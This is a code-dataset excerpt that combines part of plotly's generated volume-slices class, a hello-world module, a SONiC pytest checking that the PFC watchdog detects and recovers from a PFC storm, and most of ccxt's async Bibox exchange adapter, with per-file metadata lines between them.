import copy as _copy
class Y(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "volume.slices"
_path_str = "volume.slices.y"
_valid_props = {"fill", "locations", "locationssrc", "show"}
# fill
# ----
@property
def fill(self):
"""
Sets the fill ratio of the `slices`. The default fill value of
the `slices` is 1 meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than one would allow
the creation of openings parallel to the edges.
The 'fill' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self["fill"]
@fill.setter
def fill(self, val):
self["fill"] = val
# locations
# ---------
@property
def locations(self):
"""
Specifies the location(s) of slices on the axis. When not
specified slices would be created for all points of the axis y
except start and end.
The 'locations' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["locations"]
@locations.setter
def locations(self, val):
self["locations"] = val
# locationssrc
# ------------
@property
def locationssrc(self):
"""
Sets the source reference on Chart Studio Cloud for locations
.
The 'locationssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["locationssrc"]
@locationssrc.setter
def locationssrc(self, val):
self["locationssrc"] = val
# show
# ----
@property
def show(self):
"""
Determines whether or not slice planes about the y dimension
are drawn.
The 'show' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["show"]
@show.setter
def show(self, val):
self["show"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
fill
Sets the fill ratio of the `slices`. The default fill
value of the `slices` is 1 meaning that they are
entirely shaded. On the other hand Applying a `fill`
ratio less than one would allow the creation of
openings parallel to the edges.
locations
Specifies the location(s) of slices on the axis. When
not specified slices would be created for all points of
the axis y except start and end.
locationssrc
Sets the source reference on Chart Studio Cloud for
locations .
show
Determines whether or not slice planes about the y
dimension are drawn.
"""
def __init__(
self,
arg=None,
fill=None,
locations=None,
locationssrc=None,
show=None,
**kwargs
):
"""
Construct a new Y object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.volume.slices.Y`
fill
Sets the fill ratio of the `slices`. The default fill
value of the `slices` is 1 meaning that they are
entirely shaded. On the other hand Applying a `fill`
ratio less than one would allow the creation of
openings parallel to the edges.
locations
Specifies the location(s) of slices on the axis. When
not specified slices would be created for all points of
the axis y except start and end.
locationssrc
Sets the source reference on Chart Studio Cloud for
locations .
show
Determines whether or not slice planes about the y
dimension are drawn.
Returns
-------
Y
"""
super(Y, self).__init__("y")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.volume.slices.Y
constructor must be a dict or
an instance of :class:`plotly.graph_objs.volume.slices.Y`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("fill", None)
_v = fill if fill is not None else _v
if _v is not None:
self["fill"] = _v
_v = arg.pop("locations", None)
_v = locations if locations is not None else _v
if _v is not None:
self["locations"] = _v
_v = arg.pop("locationssrc", None)
_v = locationssrc if locationssrc is not None else _v
if _v is not None:
self["locationssrc"] = _v
_v = arg.pop("show", None)
_v = show if show is not None else _v
if _v is not None:
self["show"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
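# A small usage sketch (assuming plotly's public graph_objects API; the numbers
# are illustrative and a real Volume trace still needs its x/y/z/value arrays):
#
#   import plotly.graph_objects as go
#   slices_y = go.volume.slices.Y(show=True, locations=[0.0, 0.5], fill=1)
#   fig = go.Figure(go.Volume(slices=dict(y=slices_y)))
#
# `show` toggles the y slice planes, `locations` picks where they sit on the
# y axis, and `fill` in [0, 1] controls how much of each plane is shaded.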
avg_line_length: 28.67907 | max_line_length: 82 | alphanum_fraction: 0.541194

hexsha: 794e18468d7c43b4aaf696656dd6b4236b913101 | size: 51 | ext: py | lang: Python
max_stars: vesselregistration/moduleone.py | mjirik/vesselregistration | ed0686625560ebb69a7f2fdf527b8d1ab21ae503 | ["MIT"] | count: null | dates: null
max_issues: vesselregistration/moduleone.py | mjirik/vesselregistration | ed0686625560ebb69a7f2fdf527b8d1ab21ae503 | ["MIT"] | count: null | dates: null
max_forks: vesselregistration/moduleone.py | mjirik/vesselregistration | ed0686625560ebb69a7f2fdf527b8d1ab21ae503 | ["MIT"] | count: null | dates: null
content:
def print_hello(name):
print("Hello " + name)
avg_line_length: 12.75 | max_line_length: 26 | alphanum_fraction: 0.627451

hexsha: 794e191b6141569729ce5dc653dc5e9b9fd131a4 | size: 6,079 | ext: py | lang: Python
max_stars: tests/pfcwd/test_pfcwd_all_port_storm.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | ["Apache-2.0"] | count: 132 | 2016-10-19T12:34:44.000Z – 2022-03-16T09:00:39.000Z
max_issues: tests/pfcwd/test_pfcwd_all_port_storm.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | ["Apache-2.0"] | count: 3,152 | 2016-09-21T23:05:58.000Z – 2022-03-31T23:29:08.000Z
max_forks: tests/pfcwd/test_pfcwd_all_port_storm.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | ["Apache-2.0"] | count: 563 | 2016-09-20T01:00:15.000Z – 2022-03-31T22:43:54.000Z
content:
import logging
import os
import time
import pytest
from tests.common.fixtures.conn_graph_facts import fanout_graph_facts
from tests.common.helpers.pfc_storm import PFCMultiStorm
from tests.common.plugins.loganalyzer.loganalyzer import LogAnalyzer
from .files.pfcwd_helper import start_wd_on_ports
TEMPLATES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "templates")
EXPECT_PFC_WD_DETECT_RE = ".* detected PFC storm .*"
EXPECT_PFC_WD_RESTORE_RE = ".*storm restored.*"
pytestmark = [
pytest.mark.disable_loganalyzer,
pytest.mark.topology('any')
]
logger = logging.getLogger(__name__)
@pytest.fixture(scope='class', autouse=True)
def stop_pfcwd(duthosts, rand_one_dut_hostname):
"""
Fixture that stops PFC Watchdog before each test run
Args:
duthost (AnsibleHost): DUT instance
"""
duthost = duthosts[rand_one_dut_hostname]
logger.info("--- Stop Pfcwd --")
duthost.command("pfcwd stop")
@pytest.fixture(scope='class', autouse=True)
def storm_test_setup_restore(setup_pfc_test, fanout_graph_facts, duthosts, rand_one_dut_hostname, fanouthosts):
"""
Fixture that inits the test vars, start PFCwd on ports and cleans up after the test run
Args:
setup_pfc_test (fixture): module scoped, autouse PFC fixture
fanout_graph_facts (fixture): fanout graph info
duthost (AnsibleHost): DUT instance
fanouthosts (AnsibleHost): fanout instance
Yields:
storm_hndle (PFCStorm): class PFCStorm instance
"""
duthost = duthosts[rand_one_dut_hostname]
setup_info = setup_pfc_test
neighbors = setup_info['neighbors']
port_list = setup_info['port_list']
ports = (" ").join(port_list)
pfc_queue_index = 3
pfc_frames_number = 10000000
pfc_wd_detect_time = 200
pfc_wd_restore_time = 200
pfc_wd_restore_time_large = 30000
peer_params = populate_peer_info(port_list, neighbors, pfc_queue_index, pfc_frames_number)
storm_hndle = set_storm_params(duthost, fanout_graph_facts, fanouthosts, peer_params)
start_wd_on_ports(duthost, ports, pfc_wd_restore_time, pfc_wd_detect_time)
yield storm_hndle
logger.info("--- Storm test cleanup ---")
storm_hndle.stop_pfc_storm()
def populate_peer_info(port_list, neighbors, q_idx, frames_cnt):
"""
Build the peer_info map which will be used by the storm generation class
Args:
port_list (list): set of ports on which the PFC storm needs to be generated
neighbors (dict): fanout info for each DUT port
q_idx (int): queue on which PFC frames need to be generated
frames_cnt (int): Number of PFC frames to generate
Returns:
peer_params (dict): all PFC params needed for each fanout for storm generation
"""
peer_port_map = dict()
for port in port_list:
peer_dev = neighbors[port]['peerdevice']
peer_port = neighbors[port]['peerport']
peer_port_map.setdefault(peer_dev, []).append(peer_port)
peer_params = dict()
for peer_dev in peer_port_map:
peer_port_map[peer_dev] = (',').join(peer_port_map[peer_dev])
peer_params[peer_dev] = {'pfc_frames_number': frames_cnt,
'pfc_queue_index': q_idx,
'intfs': peer_port_map[peer_dev]
}
return peer_params
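# A worked example of the mapping built above (hypothetical port and fanout names):
# with port_list = ["Ethernet0", "Ethernet4"], both neighbors pointing at fanout
# "arista-01" on peer ports "Ethernet1" / "Ethernet2", q_idx = 3 and
# frames_cnt = 10000000, the function returns:
#
#   {"arista-01": {"pfc_frames_number": 10000000,
#                  "pfc_queue_index": 3,
#                  "intfs": "Ethernet1,Ethernet2"}}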
def set_storm_params(duthost, fanout_graph, fanouthosts, peer_params):
"""
Setup storm parameters
Args:
duthost (AnsibleHost): DUT instance
fanout_graph (fixture): fanout info
fanouthosts (AnsibleHost): fanout instance
peer_params (dict): all PFC params needed for each fanout for storm generation
Returns:
        storm_hndle (PFCMultiStorm): class PFCMultiStorm instance
"""
storm_hndle = PFCMultiStorm(duthost, fanout_graph, fanouthosts, peer_params)
storm_hndle.set_storm_params()
return storm_hndle
@pytest.mark.usefixtures('stop_pfcwd', 'storm_test_setup_restore')
class TestPfcwdAllPortStorm(object):
""" PFC storm test class """
def run_test(self, duthost, storm_hndle, expect_regex, syslog_marker, action):
"""
Storm generation/restoration on all ports and verification
Args:
duthost (AnsibleHost): DUT instance
            storm_hndle (PFCMultiStorm): class PFCMultiStorm instance
expect_regex (list): list of expect regexs to be matched in the syslog
syslog_marker (string): marker prefix written to the syslog
action (string): storm/restore action
"""
loganalyzer = LogAnalyzer(ansible_host=duthost, marker_prefix=syslog_marker)
ignore_file = os.path.join(TEMPLATES_DIR, "ignore_pfc_wd_messages")
reg_exp = loganalyzer.parse_regexp_file(src=ignore_file)
loganalyzer.ignore_regex.extend(reg_exp)
loganalyzer.expect_regex = []
loganalyzer.expect_regex.extend(expect_regex)
loganalyzer.match_regex = []
with loganalyzer:
if action == "storm":
storm_hndle.start_pfc_storm()
elif action == "restore":
storm_hndle.stop_pfc_storm()
time.sleep(5)
def test_all_port_storm_restore(self, duthosts, rand_one_dut_hostname, storm_test_setup_restore):
"""
Tests PFC storm/restore on all ports
Args:
duthost (AnsibleHost): DUT instance
storm_test_setup_restore (fixture): class scoped autouse setup fixture
"""
duthost = duthosts[rand_one_dut_hostname]
storm_hndle = storm_test_setup_restore
logger.info("--- Testing if PFC storm is detected on all ports ---")
self.run_test(duthost, storm_hndle, expect_regex=[EXPECT_PFC_WD_DETECT_RE], syslog_marker="all_port_storm",
action="storm")
logger.info("--- Testing if PFC storm is restored on all ports ---")
self.run_test(duthost, storm_hndle, expect_regex=[EXPECT_PFC_WD_RESTORE_RE], syslog_marker="all_port_storm_restore",
action="restore")
avg_line_length: 38.232704 | max_line_length: 124 | alphanum_fraction: 0.691232

hexsha: 794e198ec6d97e867e51117264495da76ac669ad | size: 57,633 | ext: py | lang: Python
max_stars: python/ccxt/async_support/bibox.py | ebarti/ccxt | da2770a5ec3fa6b18e789f202cdebdab71925f64 | ["MIT"] | count: null | dates: null
max_issues: python/ccxt/async_support/bibox.py | ebarti/ccxt | da2770a5ec3fa6b18e789f202cdebdab71925f64 | ["MIT"] | count: null | dates: null
max_forks: python/ccxt/async_support/bibox.py | ebarti/ccxt | da2770a5ec3fa6b18e789f202cdebdab71925f64 | ["MIT"] | count: 1 | 2022-03-14T18:27:32.000Z – 2022-03-14T18:27:32.000Z
content:
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import hashlib
import math
import json
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.precise import Precise
class bibox(Exchange):
def describe(self):
return self.deep_extend(super(bibox, self).describe(), {
'id': 'bibox',
'name': 'Bibox',
'countries': ['CN', 'US', 'KR'],
'version': 'v1',
'hostname': 'bibox.com',
'has': {
'CORS': None,
'spot': True,
'margin': None, # has but unimplemented
'swap': None, # has but unimplemented
'future': None,
'option': None,
'cancelOrder': True,
'createMarketOrder': None, # or they will return https://github.com/ccxt/ccxt/issues/2338
'createOrder': True,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRates': False,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchFundingFees': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTrades': True,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1min',
'5m': '5min',
'15m': '15min',
'30m': '30min',
'1h': '1hour',
'2h': '2hour',
'4h': '4hour',
'6h': '6hour',
'12h': '12hour',
'1d': 'day',
'1w': 'week',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/77257418-3262b000-6c85-11ea-8fb8-20bdf20b3592.jpg',
'api': 'https://api.{hostname}',
'www': 'https://www.bibox365.com',
'doc': [
'https://biboxcom.github.io/en/',
],
'fees': 'https://bibox.zendesk.com/hc/en-us/articles/360002336133',
'referral': 'https://w2.bibox365.com/login/register?invite_code=05Kj3I',
},
'api': {
'public': {
'post': [
# TODO: rework for full endpoint/cmd paths here
'mdata',
],
'get': [
'cquery',
'mdata',
'cdata',
'orderpending',
],
},
'private': {
'post': [
'cquery',
'ctrade',
'user',
'orderpending',
'transfer',
],
},
'v2private': {
'post': [
'assets/transfer/spot',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'taker': self.parse_number('0.001'),
'maker': self.parse_number('0.0008'),
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {},
'deposit': {},
},
},
'exceptions': {
'2011': AccountSuspended, # Account is locked
'2015': AuthenticationError, # Google authenticator is wrong
'2021': InsufficientFunds, # Insufficient balance available for withdrawal
'2027': InsufficientFunds, # Insufficient balance available(for trade)
'2033': OrderNotFound, # operation failed! Orders have been completed or revoked
'2065': InvalidOrder, # Precatory price is exorbitant, please reset
'2066': InvalidOrder, # Precatory price is low, please reset
'2067': InvalidOrder, # Does not support market orders
'2068': InvalidOrder, # The number of orders can not be less than
'2078': InvalidOrder, # unvalid order price
'2085': InvalidOrder, # Order quantity is too small
'2091': RateLimitExceeded, # request is too frequency, please try again later
'2092': InvalidOrder, # Minimum amount not met
'2131': InvalidOrder, # The order quantity cannot be greater than
'3000': BadRequest, # Requested parameter incorrect
'3002': BadRequest, # Parameter cannot be null
'3012': AuthenticationError, # invalid apiKey
'3016': BadSymbol, # Trading pair error
'3024': PermissionDenied, # wrong apikey permissions
'3025': AuthenticationError, # signature failed
'4000': ExchangeNotAvailable, # current network is unstable
'4003': DDoSProtection, # server busy please try again later
},
'commonCurrencies': {
'APENFT(NFT)': 'NFT',
'BOX': 'DefiBox',
'BPT': 'BlockPool Token',
'GTC': 'Game.com',
'KEY': 'Bihu',
'MTC': 'MTC Mesh Network', # conflict with MTC Docademic doc.com Token https://github.com/ccxt/ccxt/issues/6081 https://github.com/ccxt/ccxt/issues/3025
'NFT': 'NFT Protocol',
'PAI': 'PCHAIN',
'REVO': 'Revo Network',
'STAR': 'Starbase',
'TERN': 'Ternio-ERC20',
},
})
async def fetch_markets(self, params={}):
request = {
'cmd': 'pairList',
}
response = await self.publicGetMdata(self.extend(request, params))
#
# {
# "result": [
# {
# "id":1,
# "pair":"BIX_BTC",
# "pair_type":0,
# "area_id":7,
# "is_hide":0,
# "decimal":8,
# "amount_scale":4
# }
# ],
# "cmd":"pairList",
# "ver":"1.1"
# }
#
markets = self.safe_value(response, 'result')
request2 = {
'cmd': 'tradeLimit',
}
response2 = await self.publicGetOrderpending(self.extend(request2, params))
#
# {
# result: {
# min_trade_price: {default: '0.00000001', USDT: '0.0001', DAI: '0.0001'},
# min_trade_amount: {default: '0.0001'},
# min_trade_money: {
# USDT: '1',
# USDC: '1',
# DAI: '1',
# GUSD: '1',
# BIX: '3',
# BTC: '0.0002',
# ETH: '0.005'
# }
# },
# cmd: 'tradeLimit'
# }
#
result2 = self.safe_value(response2, 'result', {})
minCosts = self.safe_value(result2, 'min_trade_money', {})
result = []
for i in range(0, len(markets)):
market = markets[i]
numericId = self.safe_integer(market, 'id')
id = self.safe_string(market, 'pair')
baseId = None
quoteId = None
if id is not None:
parts = id.split('_')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
type = 'spot'
spot = True
areaId = self.safe_integer(market, 'area_id')
if areaId == 16:
# TODO: update to v3 api
continue
result.append({
'id': id,
'numericId': numericId,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': type,
'spot': spot,
'margin': False,
'swap': False,
'future': False,
'option': False,
'active': None,
'contract': False,
'linear': None,
'inverse': None,
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.safe_integer(market, 'amount_scale'),
'price': self.safe_integer(market, 'decimal'),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': None,
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(minCosts, quoteId),
'max': None,
},
},
'info': market,
})
return result
def parse_ticker(self, ticker, market=None):
# we don't set values that are not defined by the exchange
timestamp = self.safe_integer(ticker, 'timestamp')
symbol = None
if market is not None:
symbol = market['symbol']
else:
baseId = self.safe_string(ticker, 'coin_symbol')
quoteId = self.safe_string(ticker, 'currency_symbol')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
last = self.safe_string(ticker, 'last')
change = self.safe_string(ticker, 'change')
baseVolume = self.safe_string_2(ticker, 'vol', 'vol24H')
percentage = self.safe_string(ticker, 'percent')
if percentage is not None:
percentage = percentage.replace('%', '')
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_string(ticker, 'high'),
'low': self.safe_string(ticker, 'low'),
'bid': self.safe_string(ticker, 'buy'),
'bidVolume': self.safe_string(ticker, 'buy_amount'),
'ask': self.safe_string(ticker, 'sell'),
'askVolume': self.safe_string(ticker, 'sell_amount'),
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': percentage,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': self.safe_string(ticker, 'amount'),
'info': ticker,
}, market, False)
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'ticker',
'pair': market['id'],
}
response = await self.publicGetMdata(self.extend(request, params))
return self.parse_ticker(response['result'], market)
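    # A hedged usage sketch (live network calls omitted; the symbol is illustrative
    # and assumes this class is used through the installed ccxt.async_support package):
    #
    #   import asyncio
    #   import ccxt.async_support as ccxt
    #
    #   async def main():
    #       exchange = ccxt.bibox()
    #       ticker = await exchange.fetch_ticker('BTC/USDT')
    #       print(ticker['last'])
    #       await exchange.close()
    #
    #   asyncio.run(main())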
async def fetch_tickers(self, symbols=None, params={}):
request = {
'cmd': 'marketAll',
}
response = await self.publicGetMdata(self.extend(request, params))
tickers = self.parse_tickers(response['result'], symbols)
result = self.index_by(tickers, 'symbol')
return self.filter_by_array(result, 'symbol', symbols)
def parse_trade(self, trade, market=None):
timestamp = self.safe_integer_2(trade, 'time', 'createdAt')
side = self.safe_integer_2(trade, 'side', 'order_side')
side = 'buy' if (side == 1) else 'sell'
symbol = None
if market is None:
marketId = self.safe_string(trade, 'pair')
if marketId is None:
baseId = self.safe_string(trade, 'coin_symbol')
quoteId = self.safe_string(trade, 'currency_symbol')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
if market is not None:
symbol = market['symbol']
fee = None
feeCostString = self.safe_string(trade, 'fee')
feeCurrency = self.safe_string(trade, 'fee_symbol')
if feeCurrency is not None:
if feeCurrency in self.currencies_by_id:
feeCurrency = self.currencies_by_id[feeCurrency]['code']
else:
feeCurrency = self.safe_currency_code(feeCurrency)
feeRate = None # todo: deduce from market if market is defined
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
if feeCostString is not None:
fee = {
'cost': Precise.string_neg(feeCostString),
'currency': feeCurrency,
'rate': feeRate,
}
id = self.safe_string(trade, 'id')
return self.safe_trade({
'info': trade,
'id': id,
'order': None, # Bibox does not have it(documented) yet
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': 'limit',
'takerOrMaker': None,
'side': side,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'deals',
'pair': market['id'],
}
if limit is not None:
request['size'] = limit # default = 200
response = await self.publicGetMdata(self.extend(request, params))
return self.parse_trades(response['result'], market, since, limit)
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'depth',
'pair': market['id'],
}
if limit is not None:
request['size'] = limit # default = 200
response = await self.publicGetMdata(self.extend(request, params))
return self.parse_order_book(response['result'], symbol, self.safe_number(response['result'], 'update_time'), 'bids', 'asks', 'price', 'volume')
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "time":1591448220000,
# "open":"0.02507029",
# "high":"0.02507029",
# "low":"0.02506349",
# "close":"0.02506349",
# "vol":"5.92000000"
# }
#
return [
self.safe_integer(ohlcv, 'time'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number(ohlcv, 'vol'),
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=1000, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'kline',
'pair': market['id'],
'period': self.timeframes[timeframe],
'size': limit,
}
response = await self.publicGetMdata(self.extend(request, params))
#
# {
# "result":[
# {"time":1591448220000,"open":"0.02507029","high":"0.02507029","low":"0.02506349","close":"0.02506349","vol":"5.92000000"},
# {"time":1591448280000,"open":"0.02506449","high":"0.02506975","low":"0.02506108","close":"0.02506843","vol":"5.72000000"},
# {"time":1591448340000,"open":"0.02506698","high":"0.02506698","low":"0.02506452","close":"0.02506519","vol":"4.86000000"},
# ],
# "cmd":"kline",
# "ver":"1.1"
# }
#
result = self.safe_value(response, 'result', [])
return self.parse_ohlcvs(result, market, timeframe, since, limit)
async def fetch_currencies(self, params={}):
if self.check_required_credentials(False):
return await self.fetch_currencies_private(params)
else:
return await self.fetch_currencies_public(params)
async def fetch_currencies_public(self, params={}):
request = {
'cmd': 'currencies',
}
response = await self.publicGetCdata(self.extend(request, params))
#
# publicGetCdata
#
# {
# "result":[
# {
# "symbol":"BTC",
# "name":"BTC",
# "valid_decimals":8,
# "original_decimals":8,
# "is_erc20":0,
# "enable_withdraw":1,
# "enable_deposit":1,
# "withdraw_min":0.005,
# "describe_summary":"[{\"lang\":\"zh-cn\",\"text\":\"Bitcoin 比特币的概念最初由中本聪在2009年提出,是点对点的基于 SHA-256 算法的一种P2P形式的数字货币,点对点的传输意味着一个去中心化的支付系统。\"},{\"lang\":\"en-ww\",\"text\":\"Bitcoin is a digital asset and a payment system invented by Satoshi Nakamoto who published a related paper in 2008 and released it as open-source software in 2009. The system featured as peer-to-peer; users can transact directly without an intermediary.\"}]"
# }
# ],
# "cmd":"currencies"
# }
#
currencies = self.safe_value(response, 'result')
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = self.safe_string(currency, 'symbol')
name = self.safe_string(currency, 'name') # contains hieroglyphs causing python ASCII bug
code = self.safe_currency_code(id)
precision = self.safe_integer(currency, 'valid_decimals')
deposit = self.safe_value(currency, 'enable_deposit')
withdraw = self.safe_value(currency, 'enable_withdraw')
active = (deposit and withdraw)
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': active,
'deposit': deposit,
'withdraw': withdraw,
'fee': None,
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': None,
},
'withdraw': {
'min': self.safe_number(currency, 'withdraw_min'),
'max': None,
},
},
}
return result
async def fetch_currencies_private(self, params={}):
if not self.check_required_credentials(False):
raise AuthenticationError(self.id + " fetchCurrencies is an authenticated endpoint, therefore it requires 'apiKey' and 'secret' credentials. If you don't need currency details, set exchange.has['fetchCurrencies'] = False before calling its methods.")
request = {
'cmd': 'transfer/coinList',
'body': {},
}
response = await self.privatePostTransfer(self.extend(request, params))
#
# {
# "result":[
# {
# "result":[
# {
# "totalBalance":"14.60987476",
# "balance":"14.60987476",
# "freeze":"0.00000000",
# "id":60,
# "symbol":"USDT",
# "icon_url":"/appimg/USDT_icon.png",
# "describe_url":"[{\"lang\":\"zh-cn\",\"link\":\"https://bibox.zendesk.com/hc/zh-cn/articles/115004798234\"},{\"lang\":\"en-ww\",\"link\":\"https://bibox.zendesk.com/hc/en-us/articles/115004798234\"}]",
# "name":"USDT",
# "enable_withdraw":1,
# "enable_deposit":1,
# "enable_transfer":1,
# "confirm_count":2,
# "is_erc20":1,
# "forbid_info":null,
# "describe_summary":"[{\"lang\":\"zh-cn\",\"text\":\"USDT 是 Tether 公司推出的基于稳定价值货币美元(USD)的代币 Tether USD(简称USDT),1USDT=1美元,用户可以随时使用 USDT 与 USD 进行1:1的兑换。\"},{\"lang\":\"en-ww\",\"text\":\"USDT is a cryptocurrency asset issued on the Bitcoin blockchain via the Omni Layer Protocol. Each USDT unit is backed by a U.S Dollar held in the reserves of the Tether Limited and can be redeemed through the Tether Platform.\"}]",
# "total_amount":4776930644,
# "supply_amount":4642367414,
# "price":"--",
# "contract_father":"OMNI",
# "supply_time":"--",
# "comment":null,
# "chain_type":"OMNI",
# "general_name":"USDT",
# "contract":"31",
# "original_decimals":8,
# "deposit_type":0,
# "hasCobo":0,
# "BTCValue":"0.00027116",
# "CNYValue":"90.36087919",
# "USDValue":"14.61090236",
# "children":[
# {"type":"ERC20","symbol":"eUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":13},
# {"type":"TRC20","symbol":"tUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":20},
# {"type":"OMNI","symbol":"USDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":2},
# {"type":"HECO","symbol":"hUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":12},
# {"type":"BSC(BEP20)","symbol":"bUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":5},
# {"type":"HPB","symbol":"pUSDT","enable_deposit":1,"enable_withdraw":1,"confirm_count":20}
# ]
# }
# ],
# "cmd":"transfer/coinList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
currencies = self.safe_value(firstResult, 'result')
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = self.safe_string(currency, 'symbol')
name = currency['name'] # contains hieroglyphs causing python ASCII bug
code = self.safe_currency_code(id)
precision = 8
deposit = self.safe_value(currency, 'enable_deposit')
withdraw = self.safe_value(currency, 'enable_withdraw')
active = (deposit and withdraw)
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': active,
'fee': None,
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'withdraw': {
'min': None,
'max': math.pow(10, precision),
},
},
}
return result
def parse_balance(self, response):
outerResult = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResult, 0, {})
innerResult = self.safe_value(firstResult, 'result')
result = {'info': response}
assetsList = self.safe_value(innerResult, 'assets_list', [])
for i in range(0, len(assetsList)):
balance = assetsList[i]
currencyId = self.safe_string(balance, 'coin_symbol')
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'balance')
account['used'] = self.safe_string(balance, 'freeze')
result[code] = account
return self.safe_balance(result)
async def fetch_balance(self, params={}):
await self.load_markets()
type = self.safe_string(params, 'type', 'assets')
params = self.omit(params, 'type')
request = {
'cmd': 'transfer/' + type, # assets, mainAssets
'body': self.extend({
'select': 1, # return full info
}, params),
}
response = await self.privatePostTransfer(request)
#
# {
# "result":[
# {
# "result":{
# "total_btc":"0.00000298",
# "total_cny":"0.99",
# "total_usd":"0.16",
# "assets_list":[
# {"coin_symbol":"BTC","BTCValue":"0.00000252","CNYValue":"0.84","USDValue":"0.14","balance":"0.00000252","freeze":"0.00000000"},
# {"coin_symbol":"LTC","BTCValue":"0.00000023","CNYValue":"0.07","USDValue":"0.01","balance":"0.00006765","freeze":"0.00000000"},
# {"coin_symbol":"USDT","BTCValue":"0.00000023","CNYValue":"0.08","USDValue":"0.01","balance":"0.01252100","freeze":"0.00000000"}
# ]
# },
# "cmd":"transfer/assets"
# }
# ]
# }
#
return self.parse_balance(response)
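        #
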